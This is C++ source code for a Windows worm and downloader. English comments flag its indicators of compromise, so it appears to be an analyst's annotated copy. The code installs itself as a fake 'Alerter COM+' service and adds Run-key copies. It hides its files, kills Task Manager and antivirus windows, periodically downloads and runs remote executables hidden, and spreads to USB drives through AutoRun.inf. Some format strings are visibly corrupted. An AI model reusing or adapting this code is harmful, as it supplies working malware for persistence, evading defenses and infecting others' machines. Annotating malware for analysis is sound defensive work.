memset(szSysDir,0,sizeof(szSysDir));
::GetSystemDirectory(szSysDir,sizeof(szSysDir));
strcat(szSysDir,"\\IME\\svchost.exe"); // IOC: service binary path

scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);// open the SCM database (needs admin)
if (scm!=NULL)
{
// IOC: service and display name "Alerter COM+", SERVICE_AUTO_START, interactive
svc=::CreateService(scm,"Alerter COM+","Alerter COM+",SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,
SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,szSysDir,NULL,NULL,NULL,NULL,NULL);

svc=::OpenService(scm,"Alerter COM+",SERVICE_START);
if (svc!=NULL)
{
if(StartService(svc,0,NULL)==0)// start failed; fine if it is already running
{
dwErrorCode=GetLastError();
if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
{
CloseServiceHandle(scm);
CloseServiceHandle(svc);
return true;
}
}
// wait while the service is still START_PENDING
while(QueryServiceStatus(svc,&amt;service_status_ss)!=0)
{
if(service_status_ss.dwCurrentState==SERVICE_START_PENDING)
{
Sleep(100);
}
else
{
break;
}
}
CloseServiceHandle(svc);
}
CloseServiceHandle(scm);
}
else
return false;

return true;
}
/************************************************/
/************************************************/
/************************************************/
/************************************************/
// Creates a hidden top-level window (class "WebDown", title "Alerter COM+" -
// both usable as IOCs) whose WndProc hosts the timers and device-change
// handling, then runs the message loop until WM_QUIT (which nothing here
// posts). The synthetic WM_DEVICECHANGE has wParam 0, which OnDeviceChange
// ignores, so it is effectively a no-op.
int CreateMyWindow()
{
MSG msg;
WNDCLASS wndc;
LPSTR szAppName="WebDown";
wndc.style=0;
wndc.lpfnWndProc=WndProc;
wndc.cbClsExtra=0;
wndc.cbWndExtra=0;
wndc.hInstance=NULL;
wndc.hIcon=NULL;
wndc.hCursor=NULL;
wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
wndc.lpszMenuName=NULL;
wndc.lpszClassName=szAppName;
RegisterClass(&amt;wndc);
hWnd=CreateWindow(szAppName,"Alerter COM+",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT,CW_USEDEFAULT,
CW_USEDEFAULT,CW_USEDEFAULT,
NULL,NULL,NULL,NULL);
ShowWindow(hWnd,SW_HIDE);
UpdateWindow(hWnd);

SendMessage(hWnd,WM_DEVICECHANGE,0,0);// probe for an already-inserted device (no-op, see above)

while(GetMessage(&amt;msg,NULL,0,0))
{
TranslateMessage(&amt;msg);
DispatchMessage(&amt;msg);
}
return 1;
}

// Secondary persistence, re-run every second from WndProc timer 1 while
// IsAnti is set: copies this executable to <system32>\internt.exe and
// <system32>\progmon.exe, registers both under HKLM\...\CurrentVersion\Run
// as "Internt" and "Program file", and sets Explorer's SHOWALL\CheckedValue
// to 0 so the "show hidden files" option stops working (hides the dropped
// hidden+system files). All of these are IOCs.
// Notes: SetFileAttrib is applied to the system directory itself, not to the
// copied files; RegSetValueEx is given dwSize = MAX_PATH, so the whole 260-byte
// buffer (including its uninitialised tail) is written; on RegOpenKeyEx failure
// an uninitialised hKEY is passed to RegCloseKey.
BOOL Register()
{
long ret = 0;
HKEY hKEY;
char chCurPath[MAX_PATH];
char chSysPath[MAX_PATH];
char lpNewFileName1[MAX_PATH];
char lpNewFileName2[MAX_PATH];
LPSTR lpCurFileName;
DWORD dwType = REG_SZ;
DWORD dwSize = MAX_PATH;
char lpRegPath[256] = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";

::GetSystemDirectory(chSysPath, dwSize);
::GetModuleFileName(NULL, chCurPath, dwSize);

// drop two more copies of ourselves
lpCurFileName = chCurPath;
sprintf(lpNewFileName1, ">s\\internt.exe", chSysPath);
SetFileAttrib(chSysPath);
ret = CopyFile(lpCurFileName, lpNewFileName1, FALSE);
sprintf(lpNewFileName2, ">s\\progmon.exe", chSysPath);
SetFileAttrib(chSysPath);
ret = CopyFile(lpCurFileName, lpNewFileName2, FALSE);
// open the machine-wide Run key
ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpRegPath, 0, KEY_WRITE, &amt;hKEY);
if(ret != ERROR_SUCCESS)
{
RegCloseKey(hKEY);
return FALSE;
}

// Run values "Internt" and "Program file"
ret = RegSetValueEx(hKEY, "Internt", NULL, dwType,
(const unsigned char*)lpNewFileName1, dwSize);

ret = RegSetValueEx(hKEY, "Program file", NULL, dwType,
(const unsigned char*)lpNewFileName2, dwSize);

RegCloseKey(hKEY);

//----------------------- break Explorer's "show hidden files" toggle
DWORD dwData=0x00000000;
char lpRegPath2[256] = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL";
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,lpRegPath2,0,KEY_READ|KEY_WRITE,&amt;hKEY);
if(ret != ERROR_SUCCESS)
{
RegCloseKey(hKEY);
return FALSE;
}
RegSetValueEx(hKEY,"CheckedValue",0,REG_DWORD,(LPBYTE)&amt;dwData,sizeof(DWORD));
RegCloseKey(hKEY);

return TRUE;
}


///************************************************
///************************************************
// Fetches the first 8 bytes of Url (via dynamically loaded wininet, User-Agent
// "Alerter COM+", flag 0x04000000 which appears to be INTERNET_FLAG_NO_CACHE_WRITE)
// into Date, used as a change stamp by WndProc timer 2. Returns true whenever
// wininet.dll could be loaded, even if the HTTP request failed - in that case
// buf is uninitialised and strcpy copies garbage into Date (9-byte buffer).
bool GetDownFileDate(char Url[],char Date[])
{
HMODULE hDll;
LPVOID hInternet,hUrlHandle;
char buf[9];
DWORD dwFlags;

hDll = LoadLibrary("wininet.dll");
if(hDll)
{
typedef LPVOID ( WINAPI * pInternetOpen ) (LPCTSTR ,DWORD ,LPCTSTR ,LPCTSTR ,DWORD );
typedef LPVOID ( WINAPI * pInternetOpenUrl ) ( LPVOID ,LPCTSTR ,LPCTSTR ,DWORD ,DWORD ,DWORD);
typedef BOOL ( WINAPI * pInternetCloseHandle ) ( LPVOID );
typedef BOOL ( WINAPI * pInternetReadFile ) (LPVOID ,LPVOID ,DWORD ,LPDWORD) ;
pInternetOpen InternetOpen=NULL;
pInternetOpenUrl InternetOpenUrl=NULL;
pInternetCloseHandle InternetCloseHandle=NULL;
pInternetReadFile InternetReadFile=NULL;
// resolved by name; GetProcAddress failures are not checked
InternetOpen = ( pInternetOpen ) GetProcAddress( hDll, "InternetOpenA" );
InternetOpenUrl = (pInternetOpenUrl ) GetProcAddress ( hDll, "InternetOpenUrlA");
InternetCloseHandle = (pInternetCloseHandle) GetProcAddress (hDll,"InternetCloseHandle");
InternetReadFile = (pInternetReadFile) GetProcAddress(hDll,"InternetReadFile");

hInternet = InternetOpen("Alerter COM+",0, NULL, NULL, 0);
if (hInternet != NULL)
{
hUrlHandle = InternetOpenUrl(hInternet, Url, NULL, 0, 0x04000000, 0);
if (hUrlHandle!= NULL)
{
memset(buf,0,9);
InternetReadFile(hUrlHandle, buf,8, &amt;dwFlags); // first 8 bytes = "date" stamp
InternetCloseHandle(hUrlHandle);
hUrlHandle = NULL;
}
InternetCloseHandle(hInternet);
hInternet = NULL;
}
FreeLibrary(hDll);
strcpy(Date,buf);
return true;
}
else
return false;
}
// Older list-driven downloader (its only call site, in WndProc timer 2, is
// commented out). Skips the 8-byte date header, then reads the list in 100-byte
// chunks; each chunk is cut at the first '|' and passed to DownExec. Any chunk
// shorter than 100 bytes - including the final partial one - ends the loop
// without being processed, so a list smaller than 108 bytes never runs anything.
void DownFiles(char Url[])
{
HMODULE hDll;
LPVOID hInternet,hUrlHandle;
char buf[100],test[101];
DWORD dwFlags,dwSize;

hDll = LoadLibrary("wininet.dll");
if(hDll)
{
typedef LPVOID ( WINAPI * pInternetOpen ) (LPCTSTR ,DWORD ,LPCTSTR ,LPCTSTR ,DWORD );
typedef LPVOID ( WINAPI * pInternetOpenUrl ) ( LPVOID ,LPCTSTR ,LPCTSTR ,DWORD ,DWORD ,DWORD);
typedef BOOL ( WINAPI * pInternetCloseHandle ) ( LPVOID );
typedef BOOL ( WINAPI * pInternetReadFile ) (LPVOID ,LPVOID ,DWORD ,LPDWORD) ;
pInternetOpen InternetOpen=NULL;
pInternetOpenUrl InternetOpenUrl=NULL;
pInternetCloseHandle InternetCloseHandle=NULL;
pInternetReadFile InternetReadFile=NULL;
InternetOpen = ( pInternetOpen ) GetProcAddress( hDll, "InternetOpenA" );
InternetOpenUrl = (pInternetOpenUrl ) GetProcAddress ( hDll, "InternetOpenUrlA");
InternetCloseHandle = (pInternetCloseHandle) GetProcAddress (hDll,"InternetCloseHandle");
InternetReadFile = (pInternetReadFile) GetProcAddress(hDll,"InternetReadFile");

hInternet = InternetOpen("Alerter COM+",0, NULL, NULL, 0);
if (hInternet != NULL)
{
hUrlHandle = InternetOpenUrl(hInternet, Url, NULL, 0, 0x04000000, 0);
if (hUrlHandle!= NULL)
{
memset(buf,0,100);
InternetReadFile(hUrlHandle, buf,8, &amt;dwSize);// consume the 8-byte date header first
do
{
memset(buf,0,100);
if (!InternetReadFile(hUrlHandle, buf,100, &amt;dwSize))
{
break;
}
if (dwSize<100)
break; // a short read (0 = EOF, or the final partial chunk) stops processing
else
{
memset(test,0,101);
if(strstr(buf,"|")!=NULL) // '|' separates the URL from whatever follows in the record
{
strncpy(test,buf,strcspn(buf,"|"));
}
else
{
strncpy(test,buf,100);
}
//MessageBox(NULL,test,NULL,MB_OK);
DownExec(test); // fetch-and-run each listed URL
}
Sleep(1000);
}while (TRUE);
InternetCloseHandle(hUrlHandle);
hUrlHandle = NULL;
}
InternetCloseHandle(hInternet);
hInternet = NULL;
}
FreeLibrary(hDll);
}
}

// Fetch-and-run: downloads url to <system32>\down.exe (IOC, overwritten each
// time) and executes it hidden. Neither the download result nor WinExec's
// return value is checked, so a failed download re-runs the previous file.
void DownExec(char url[])
{
char SysDirBuff[256], ArpFile[256];
memset(ArpFile, 0, 256);
::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
sprintf(ArpFile, ">s\\down.exe", SysDirBuff);

URLDownloadToFile(0, url, ArpFile, 0, 0);

WinExec(ArpFile, SW_HIDE);

}


//*************************************************
//*************************************************
//*************************************************
//*************************************************
// Window procedure for the hidden window. Timer 1 (1 s) is the anti-analysis
// loop: it re-runs Register(), closes Task Manager and closes whichever window
// is under the mouse if its title (or its top-level parent's) contains one of
// the AV/firewall/process-tool keywords below. Timer 2 (WaitTime minutes)
// re-fetches DownFile when its 8-byte date stamp changes. WM_CLOSE and
// WM_DESTROY are swallowed so the window cannot be closed from outside.
LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam)
{
switch(message)
{
case WM_CREATE:
SetTimer(hWnd,1,1000,NULL); // timer 1: 1-second anti-AV sweep
SetTimer(hWnd,2,modify_data.WaitTime*60*1000,NULL); // timer 2: download-list poll (default 20 minutes)
break;
case WM_TIMER:
{
if(wParam==1) // timer 1: kill security-tool windows
{
if (!modify_data.IsAnti)
break;

// persistence refresh (the IsReg flag it was once gated on no longer exists)
//if (modify_data.IsReg)
{
Register();
}

char hstr[MAX_PATH];
char str[MAX_PATH];

POINT CurPoint;
HWND hCurrent,hParent;
GetCursorPos(&amt;CurPoint);
hCurrent=WindowFromPoint(CurPoint); // window under the mouse cursor
hParent=hCurrent;
while(GetParent(hParent)!=NULL)
hParent=GetParent(hParent); // walk up to its top-level window

// if Windows Task Manager (Chinese-locale title) is open, destroy it
if(FindWindow(NULL,"Windows 任务管理器")!=NULL)
PostMessage(FindWindow(NULL,"Windows 任务管理器"),WM_DESTROY,0,0);

// hCurrent = window under the cursor, hParent = its top-level ancestor
GetWindowText(hParent,str,MAX_PATH); // quick check whether an AV / process-killing tool is in use
GetWindowText(hCurrent,hstr,MAX_PATH);
// keyword list (Chinese + English): security guard, scan, special killer, registry,
// Process, process, virus, trojan, defense, firewall, detection, Kingsoft, Jiangmin, Kaspersky, worm, antivirus
if((strstr(str,"安全卫士") ||
strstr(str,"扫描") ||
strstr(str,"专杀") ||
strstr(str,"注册表") ||
strstr(str,"Process") ||
strstr(str,"进程") ||
strstr(str,"毒") ||
strstr(str,"木马") ||
strstr(str,"防御") ||
strstr(str,"防火墙") ||
strstr(hstr,"病毒")||
strstr(hstr,"检测")||
strstr(hstr,"Firewall")||
strstr(hstr,"virus") ||
strstr(hstr,"anti")||
strstr(hstr,"金山")||
strstr(hstr,"江民")||
strstr(hstr,"卡巴斯基")||
strstr(hstr,"worm")||
strstr(hstr,"杀毒"))
&amp;&amp; hCurrent)
{// post several times so nothing slips through
PostMessage(hCurrent,WM_DESTROY,0,0); // destroy the window under the cursor
PostMessage(hParent,WM_CLOSE,0,0); // close its top-level window
PostMessage(hCurrent,WM_CLOSE,0,0);
PostMessage(hParent,WM_DESTROY,0,0);
}
}
else if(wParam==2) // timer 2: download and run when the list changes
{
if(GetDownFileDate(modify_data.DownFile,DownFileDate2))// stamp fetched
{
if (strncmp(DownFileDate1,DownFileDate2,8)!=0)// stamp differs from last time
{// the list URL itself is fetched as an executable (DownFiles is disabled)
//DownFiles(modify_data.DownFile);
DownExec(modify_data.DownFile);
strcpy(DownFileDate1,DownFileDate2);
}
}
}
}
break;
case WM_DEVICECHANGE:// removable-media arrival
if(modify_data.IsUpan)
OnDeviceChange(hWnd,wParam,lParam);
break;
case WM_CLOSE:
return FALSE; // refuse to close
case WM_DESTROY:
return FALSE; // refuse to be destroyed (no WM_QUIT is ever posted)
default:
return DefWindowProc(hWnd,message,wParam,lParam);
}
return 0;
}


//--------------Begin U盘传播----------------------------
//--------------Begin removable-media spread----------------------------
// Writes an [AutoRun] file at path whose "open" and "explore" shell verbs run
// name (setup.exe). Note the single-backslash literals ("shell\open", ...)
// contain unrecognised escape sequences, so depending on the compiler the
// written keys may read "shellopen=" etc.; only the last line uses "\\".
// Returns FALSE if the file cannot be created.
BOOL CreateAutoRunFile(char*name,char *path)
{
FILE *out;
out=fopen(path,"w+");
if(out)
{
fprintf(out,"[AutoRun]\r\n");
// fprintf(out,"open=>s\r\n",name);
fprintf(out,"shell\open=打开(&amt;O)\r\n",name); // menu label "Open(&O)"; extra arg unused
fprintf(out,"shell\open\Command=>s\r\n",name);
fprintf(out,"shell\open\Default=1\r\n",name);
fprintf(out,"shell\explore=资源管理器(&amt;X)\r\n",name); // menu label "Explorer(&X)"; extra arg unused
fprintf(out,"shell\\explore\\command=>s\r\n",name);
fclose(out);
return TRUE;
}
else
return FALSE;
}

// Maps a DEV_BROADCAST_VOLUME unit mask (bit n set = drive letter n changed)
// to the letter of its lowest set bit, 'A' for bit 0. When none of the low 26
// bits is set the result is 'A' + 26 (i.e. '['), as in the original.
char FirstDriveFromMask(ULONG unitmask)
{
    char bit = 0;
    // advance until the first set bit or until all 26 letters are exhausted
    while (bit < 26 && (unitmask & 0x1) == 0)
    {
        unitmask >>= 1;
        ++bit;
    }
    return (char)(bit + 'A');
}

// Marks path hidden + system (replacing any other attributes). Used on every
// dropped file and autorun.inf so Explorer does not show them; together with
// the SHOWALL tweak in Register() they stay invisible even with "show hidden
// files" enabled. Returns SetFileAttributes' result.
BOOL SetFileAttrib(char *path)
{
return SetFileAttributes(path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
}

// Infects one drive: writes X:\AutoRun.inf pointing at setup.exe and copies
// the installed worm (<system32>\IME\svchost.exe, not the running image) to
// X:\setup.exe, both hidden + system. Only U[0] (the drive letter) is read.
// Returns FALSE if the copy fails; otherwise the result of hiding setup.exe.
// IOC: <drive>:\AutoRun.inf and <drive>:\setup.exe.
BOOL CopyToUAndSet(char *U)
{
char This_File[256];
memset(This_File,0,sizeof(This_File));
::GetSystemDirectory(This_File,sizeof(This_File));
strcat(This_File,"\\IME\\svchost.exe");

char szPath[40];
sprintf(szPath,">c:\\setup.exe",U[0]);// full path of the payload on the target drive
char szAutoFile[40];
sprintf(szAutoFile,">c:\\AutoRun.inf",U[0]);
if(CreateAutoRunFile("setup.exe",szAutoFile))
SetFileAttrib(szAutoFile);
if(!CopyFile(This_File,szPath,FALSE))
return FALSE;
return SetFileAttrib(szPath);
}

// WM_DEVICECHANGE handler: on volume arrival (USB stick, mounted drive) takes
// the lowest drive letter in the unit mask and infects it via CopyToUAndSet.
// Any wParam other than DBT_DEVICEARRIVAL / DBT_DEVICEREMOVECOMPLETE is
// ignored, so the synthetic wParam=0 message from CreateMyWindow does nothing.
// Only U[0] is initialised; CopyToUAndSet reads just that byte.
LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam)
{
char U[4];
PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;
switch(wParam)
{
case DBT_DEVICEARRIVAL: // media inserted
if (lpdb ->dbch_devicetype == DBT_DEVTYP_VOLUME)
{
PDEV_BROADCAST_VOLUME lpdbv = (PDEV_BROADCAST_VOLUME)lpdb;
U[0]=FirstDriveFromMask(lpdbv ->dbcv_unitmask);// drive letter of the new volume
CopyToUAndSet(U);// copy the worm onto it
}
break;
case DBT_DEVICEREMOVECOMPLETE: // media removed: nothing to do
break;
}
return LRESULT();
}
//--------------End U盘传播----------------------------